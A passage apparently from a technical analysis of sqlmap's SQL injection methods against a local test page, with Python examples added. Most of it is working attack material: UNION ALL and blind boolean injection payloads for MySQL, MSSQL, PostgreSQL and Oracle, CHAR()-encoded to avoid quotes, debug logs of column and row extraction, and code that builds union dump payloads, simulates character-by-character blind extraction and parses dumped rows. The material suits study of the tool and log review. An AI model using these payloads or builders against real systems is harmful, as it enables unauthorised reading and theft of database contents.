http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(attname AS bpchar)||(CHR(95)||CHR(95)||CHR(68)||CHR(69)||CHR(76)||CHR(95)||CHR(95))|| CAST(typname AS bpchar)||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(97)||CHR(99)||CHR(116)||CHR(111)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(COLUMN_NAME AS varchar(4000))||(CHR(95)||CHR(95)||CHR(68)||CHR(69)||CHR(76)||CHR(95)||CHR(95))|| CAST(DATA_TYPE AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(65)||CHR(67)||CHR(84)||CHR(79)||CHR(82))-- ('1'='1&database=oracle&type=2&order=1&log=1 

...

 

    Getting rows

        Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), actor_id, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM sakila.actor-- ('1'='1&database=mysql&type=2&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) CAST(actor_id AS varchar) (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL FROM Northwind..actor-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(actor_id AS bpchar)||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM public.actor-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(actor_id AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM ACTOR-- ('1'='1&database=oracle&type=2&order=1&log=1 

...
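The CHAR()/CHR() string encoding listed above under evasion features, and the __START__/__STOP__/__DEL__ markers that wrap the union output in the requests above, decoded the way a log reviewer needs them. This is an added example, not sqlmap's code or the report's: the request is one quoted on this page, while the response body is constructed here and the marker names follow from the CHAR codes shown in the requests.

```python
"""Decoder for the payload encoding used by the union requests quoted above.
Added example for reading such requests back out of a log; not sqlmap's own code."""
import re
from urllib.parse import unquote_plus

# One CHAR()/CHR() call. MySQL packs a whole string into one call, CHAR(115,97,107,...);
# MSSQL, PostgreSQL and Oracle emit one code per call. \b keeps VARCHAR(4000) out.
_TOKEN = r"\b(?:CHAR|CHR)\(\s*\d+(?:\s*,\s*\d+)*\s*\)"
# A run of such calls joined by '||' (PostgreSQL/Oracle), '+' (MSSQL) or, as in the
# URL-decoded MSSQL requests above where '+' came out as a space, plain whitespace.
_RUN = re.compile(rf"{_TOKEN}(?:\s*(?:\|\||\+)?\s*{_TOKEN})*")
_NUM = re.compile(r"\d+")

# What CHAR(95,95,83,84,65,82,84,95,95), CHAR(95,95,83,84,79,80,95,95) and
# CHAR(95,95,68,69,76,95,95) spell once decoded.
START, STOP, DEL = "__START__", "__STOP__", "__DEL__"
_ROW = re.compile(re.escape(START) + r"(.*?)" + re.escape(STOP), re.S)


def decode_char_runs(sql):
    """Replace every CHAR()/CHR() run in a SQL fragment with the quoted literal it spells."""
    def to_literal(match):
        codes = [int(n) for n in _NUM.findall(match.group(0))]
        return "'" + "".join(chr(c) for c in codes) + "'"
    return _RUN.sub(to_literal, sql)


def decode_logged_request(line):
    """URL-decode a logged request line, then decode its CHAR()/CHR() encoding."""
    return decode_char_runs(unquote_plus(line))


def extract_union_rows(body):
    """Pull every __START__...__STOP__ record out of a response body, split on __DEL__."""
    return [row.split(DEL) for row in _ROW.findall(body)]


# Constructed inputs: the MySQL table-name request quoted above, and a response body
# such a request would produce against the report's test bed.
LOGGED_REQUEST = (
    "http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT "
    "CONCAT(CHAR(95,95,83,84,65,82,84,95,95), table_schema, CHAR(95,95,68,69,76,95,95), "
    "table_name, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.TABLES "
    "WHERE table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&database=mysql&type=2&order=1&log=1"
)
RESPONSE_BODY = (
    "<table><tr><td>__START__sakila__DEL__actor__STOP__</td></tr>"
    "<tr><td>__START__sakila__DEL__film__STOP__</td></tr></table>"
)

if __name__ == "__main__":
    print(decode_logged_request(LOGGED_REQUEST))
    # ... CONCAT('__START__', table_schema, '__DEL__', table_name, '__STOP__') ...
    # ... WHERE table_schema='sakila'-- ...
    print(extract_union_rows(RESPONSE_BODY))   # [['sakila', 'actor'], ['sakila', 'film']]
```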

Algorithm/Analysis

    Finding the Injection

        a request to check connectivity
        requests to check URL stability
        a request to check whether the tested parameter is dynamic (using a numeric value: 47)
        a request to check whether the tested parameter is dynamic (using a string value containing a single quote: 'NoValue)
        a request to check whether the tested parameter is dynamic (using a string value containing a double quote: "NoValue)
        a request to check whether the tested parameter is numerically injectable
        a request to check whether the tested parameter is string-injectable (comparing against the md5 of the original response, or against the keyword supplied with the --string option)

    Blind

        Numbers, Characters
...
[21:19:50] [INFO] query: CURRENT_USER()
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 63&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 95&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 111&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 119&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 115&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 113&blind=false&order=1&database=mysql
[21:19:50] [DEBUG] request: http://localhost/sqlinj.php, POST: name=5 AND ORD(MID((CURRENT_USER()), 1, 1)) > 114&blind=false&order=1&database=mysql
...

 

         Since the same binary search algorithm is used, it makes no difference whether sqlmap injects into a numeric or a string context. How does sqlmap know that the end of the data has been reached? By looking for one extra (non-existent) character: in MySQL MID() past the end of the string returns '' and ORD('') is 0, so during that character's binary search the value collapses to 0 (zero) and sqlmap concludes the data has ended. This costs 6 extra requests per retrieved item (thresholds 63, 31, 15, 7, 3, 1).

        If we also include the 11 requests sent before any data is retrieved, the number of requests made in an attack can be written as:

 

f(n) = 7*n + 6 + 11

 

n is the length of the dumped data,

6 is the number of requests made to detect the end of the data, and

11 is the number of requests sent before any data is retrieved

           Why 7*n? Look at the sqlmap debug log below, in which the '?' character (ASCII 63) is fetched through blind SQL injection. Finding '?' takes 7 requests even though the very first threshold tested is 63 itself: the bisection only asks "greater than" questions and never tests for equality, so it always narrows the full range down. For data of length 1 this gives 7*1+6 = 13 requests. The binary search costs a fixed 7 requests per character!

 

[INFO] fetching expression output: 'select '?''
[INFO] query: select '?'
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 63 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 31 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 47 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 55 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 59 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 61 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 1, 1)) > 62 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 63 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 31 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 15 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 7 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 3 AND '1'='1&type=0&log=0&order=1&database=mysql
[DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE' AND ORD(MID((select CHAR(63)), 2, 1)) > 1 AND '1'='1&type=0&log=0&order=1&database=mysql
[INFO] retrieved: ?
[INFO] performed 13 queries in 1 seconds
select '?':    '?'
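The extraction loop the two debug logs above show, as an added Python example (not sqlmap's own code): a boolean oracle stands in for the vulnerable page and emulates MySQL's ORD(MID(...)) > limit test, and the bisection is reconstructed from the thresholds in the logs (a first midpoint of 63 followed by 95 implies the search range 0..127; the six-request terminator implies that a range collapsing to [0, 1] is read as 0). The request counter lets f(n) = 7*n + 6 + 11 be checked for any value; the 11 is the detection overhead taken from the text, and the secrets fed in are constructed.

```python
# Added example (not sqlmap's own code): a simulation of the bisection
# shown in the debug logs above, counting the requests per character so
# that f(n) = 7*n + 6 + 11 can be checked against any dumped value.
from typing import Callable, List, Tuple

DETECTION_REQUESTS = 11  # requests sent before any data is fetched (from the text)


def make_oracle(secret: str, log: List[str]) -> Callable[[int, int], bool]:
    """Return a boolean oracle standing in for the vulnerable page.

    It emulates the injected condition ORD(MID((query), pos, 1)) > limit.
    In MySQL MID() past the end of the string yields '' and ORD('') is 0,
    which is what makes the end of the data detectable.  `secret` is the
    constructed, normally unknown, query output.
    """
    def oracle(pos: int, limit: int) -> bool:
        ch = secret[pos - 1] if pos <= len(secret) else ""
        value = ord(ch) if ch else 0
        log.append(f"ORD(MID((query), {pos}, 1)) > {limit}")  # one HTTP request
        return value > limit
    return oracle


def bisect_char(oracle: Callable[[int, int], bool], pos: int) -> Tuple[int, int]:
    """Bisect the 7-bit ASCII range for the character at `pos`.

    Range and stop rule are reconstructed from the logs (assumption): a first
    threshold of 63 followed by 95 means the search space is 0..127, and the
    6-request terminator means a range that collapses to [0, 1] is read as 0
    (end of data).  Returns (ascii_value, requests_used).
    """
    min_value, max_value = 0, 127
    requests = 0
    while max_value - min_value != 1:
        limit = (max_value + min_value) // 2
        requests += 1
        if oracle(pos, limit):
            min_value = limit
        else:
            max_value = limit
    if max_value == 1:
        return 0, requests
    return max_value, requests


def extract(secret: str) -> Tuple[str, int, List[str]]:
    """Recover `secret` character by character until the bisection returns 0
    for the extra, non-existent character.  Returns the recovered string,
    the number of data requests, and the list of simulated requests."""
    log: List[str] = []
    oracle = make_oracle(secret, log)
    out: List[str] = []
    total = 0
    pos = 1
    while True:
        value, used = bisect_char(oracle, pos)
        total += used
        if value == 0:
            break
        out.append(chr(value))
        pos += 1
    return "".join(out), total, log


def predicted_requests(n: int) -> int:
    """f(n) = 7*n + 6 + 11 from the analysis above."""
    return 7 * n + 6 + DETECTION_REQUESTS


if __name__ == "__main__":
    for secret in ["?", "root", "sakila"]:
        value, used, _ = extract(secret)
        print(f"{secret!r} -> {value!r}: {used} data requests, "
              f"{used + DETECTION_REQUESTS} in total, "
              f"f({len(secret)}) = {predicted_requests(len(secret))}")
```

Running it reproduces the log: '?' costs 13 requests (7 for the character, 6 for the terminator), 'root' 7*4+6 = 34, and the generated thresholds for 'r' are 63, 95, 111, 119, 115, 113, 114 as in the CURRENT_USER() log. The 7-bit range is also the technique's limit: a byte above 127 is reported as 127 by this bisection, so a dump of non-ASCII data comes back corrupted, and the terminator rule cannot tell a genuine chr(1) from the end of the data.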

           

    Union Parse Algorithm

 

             The same requests as in the blind technique are run to find and confirm the SQL injection.

             Requests for parenthesis balancing

             Requests to determine the number of columns (one NULL added per attempt)

 

[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT NULL-- ('1'='1&blind=false&order=1&database=mysql
[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT NULL, NULL-- ('1'='1&blind=false&order=1&database=mysql
[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&blind=false&order=1&database=mysql
[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&blind=false&order=1&database=mysql

 

             A random number wrapped in the __START__/__STOP__ markers (e.g. "__START_23424_STOP__") is used to check the union injection; in the request below the random number is 11519 (CHAR(49,49,53,49,57))

 

[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), CHAR(49,49,53,49,57), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL-- ('1'='1&blind=false&order=1&database=mysql

 

             retrieving the column names (and data types) of the specified database and table (the second, identical request is used for verification)

 

[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), column_name, CHAR(95,95,68,69,76,95,95), data_type, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&blind=false&order=1&database=mysql
[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), column_name, CHAR(95,95,68,69,76,95,95), data_type, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&blind=false&order=1&database=mysql

 

             the actual request that retrieves the data (again, the second request is used for verification); the fields are wrapped in a CONCAT() with the __START__/__DEL__/__STOP__ markers so the output can be parsed out of the page easily

 

[21:40:46] [DEBUG] request: http://localhost/sqlinj.php, POST: name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), actor_id, CHAR(95,95,68,69,76,95,95), first_name, CHAR(95,95,68,69,76,95,95), last_name, CHAR(95,95,68,69,76,95,95), last_update, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM sakila.actor-- ('1'='1&blind=false&order=1&database=mysql
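The union technique described in this section, as an added Python example (not sqlmap's code): encoding payload literals as MySQL CHAR() lists so the injected string needs no quote characters (the CHAR(95,95,83,84,...) sequences in the requests above decode to __START__, __DEL__ and __STOP__), building the marker check and the CONCAT() select list that the sakila.actor dump request uses, and parsing the delimited rows back out of a page body. The response body is constructed for the example, and the vulnerable page with its four-column layout is an assumption; the `')` prefix and `-- (` suffix that close the original query are left out because they depend on the injection point.

```python
# Added example (not sqlmap's own code): building and parsing the
# delimited UNION ALL output shown in the requests above.
import re
from typing import List

START, DELIM, STOP = "__START__", "__DEL__", "__STOP__"


def mysql_char(literal: str) -> str:
    """Encode an ASCII literal as MySQL CHAR(n,n,...) so the payload carries
    no quote characters: 'sakila' -> CHAR(115,97,107,105,108,97)."""
    if not literal.isascii():
        raise ValueError("CHAR() encoding here assumes a 7-bit ASCII literal")
    return "CHAR(" + ",".join(str(ord(c)) for c in literal) + ")"


def union_marker_payload(columns: int, random_number: int) -> str:
    """The check sent once the column count is known: a random number between
    the START/STOP markers in the first column, NULL in the others."""
    concat = ", ".join(mysql_char(s) for s in (START, str(random_number), STOP))
    select_list = [f"CONCAT({concat})"] + ["NULL"] * (columns - 1)
    return "UNION ALL SELECT " + ", ".join(select_list)


def union_marker_seen(body: str, random_number: int) -> bool:
    """Did the marker round-trip through the page?  Only then is the union
    output readable and a dump worth attempting."""
    return f"{START}{random_number}{STOP}" in body


def union_dump_payload(columns: int, fields: List[str], table: str) -> str:
    """The dump request: requested fields concatenated with delimiters in the
    first column, the remaining columns padded with NULL."""
    parts = [mysql_char(START)]
    for i, field in enumerate(fields):
        if i:
            parts.append(mysql_char(DELIM))
        parts.append(field)
    parts.append(mysql_char(STOP))
    select_list = ["CONCAT(" + ", ".join(parts) + ")"] + ["NULL"] * (columns - 1)
    return f"UNION ALL SELECT {', '.join(select_list)} FROM {table}"


ROW_RE = re.compile(re.escape(START) + r"(.*?)" + re.escape(STOP), re.S)


def parse_union_rows(body: str, expected_fields: int) -> List[List[str]]:
    """Pull every START...STOP block out of the response and split it on the
    field delimiter.  A row whose field count is off (a value that itself
    contains __DEL__, or a row the page truncated) is reported instead of
    being silently misaligned with the column names."""
    rows: List[List[str]] = []
    for match in ROW_RE.finditer(body):
        fields = match.group(1).split(DELIM)
        if len(fields) != expected_fields:
            raise ValueError(f"expected {expected_fields} fields, got {fields!r}")
        rows.append(fields)
    return rows


# Constructed response body (assumption): a page that renders the first
# column of every result row, including the rows contributed by the UNION.
SAMPLE_BODY = """<html><body><table>
<tr><td>PENELOPE</td><td>GUINESS</td></tr>
<tr><td>__START__1__DEL__PENELOPE__DEL__GUINESS__DEL__2006-02-15 04:34:33__STOP__</td><td></td></tr>
<tr><td>__START__2__DEL__NICK__DEL__WAHLBERG__DEL__2006-02-15 04:34:33__STOP__</td><td></td></tr>
</table></body></html>"""

if __name__ == "__main__":
    print(union_marker_payload(4, 11519))
    print(union_dump_payload(4, ["actor_id", "first_name", "last_name", "last_update"], "sakila.actor"))
    for row in parse_union_rows(SAMPLE_BODY, 4):
        print(row)
```

The two payload builders reproduce the select lists of the marker request and of the sakila.actor dump request above byte for byte, which is a convenient way to confirm that the CHAR() sequences in a captured request really are the framing markers and not data.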